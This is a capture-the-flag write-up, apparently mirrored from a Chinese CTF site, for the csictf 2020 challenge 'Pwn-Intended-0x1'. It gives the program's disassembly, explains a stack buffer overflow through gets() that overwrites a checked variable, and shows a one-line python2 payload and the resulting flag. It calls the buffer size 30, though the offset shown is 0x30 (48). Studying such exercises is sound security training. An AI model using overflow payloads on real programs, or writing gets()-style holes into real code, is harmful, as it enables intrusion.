Pwn-Intended-0x1

点击此处获得更好的阅读体验

---

WriteUp来源

https://dunsp4rce.github.io/csictf-2020/pwn/2020/07/22/Pwn-Intended-0x1.html

by AnandSaminathan

题目描述

题目考点

解题思路

This is exactly same as coffer-overflow-0 from redpwn-2020.

Have to overwrite a variable with any value (other than zero).

mov    rax,QWORD PTR [rip+0x2ef4]        
mov    esi,0x0
mov    rdi,rax
call   0x401040 <setbuf@plt>
mov    rax,QWORD PTR [rip+0x2ef0]        
mov    esi,0x0
mov    rdi,rax
call   0x401040 <setbuf@plt>
mov    rax,QWORD PTR [rip+0x2eec]        
mov    esi,0x0
mov    rdi,rax
call   0x401040 <setbuf@plt>
lea    rdi,[rip+0xe60]        
call   0x401030 <puts@plt>
lea    rax,[rbp-0x30]
mov    rdi,rax
mov    eax,0x0
call   0x401060 <gets@plt>
lea    rdi,[rip+0xe5f]        
call   0x401030 <puts@plt>
cmp    DWORD PTR [rbp-0x4],0x0
je     0x4011ed <main+151>
lea    rdi,[rip+0xe59]        
call   0x401030 <puts@plt>
lea    rdi,[rip+0xe94]        
mov    eax,0x0
call   0x401050 <system@plt> # system("cat flag.txt")
mov    eax,0x0

The buffer size is 30, so any input of size >= 48 (multiple of 16) should print the flag. This worked:

python2 -c "print 'A'*48" | ./pwn-intended-0x1

Flag

csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}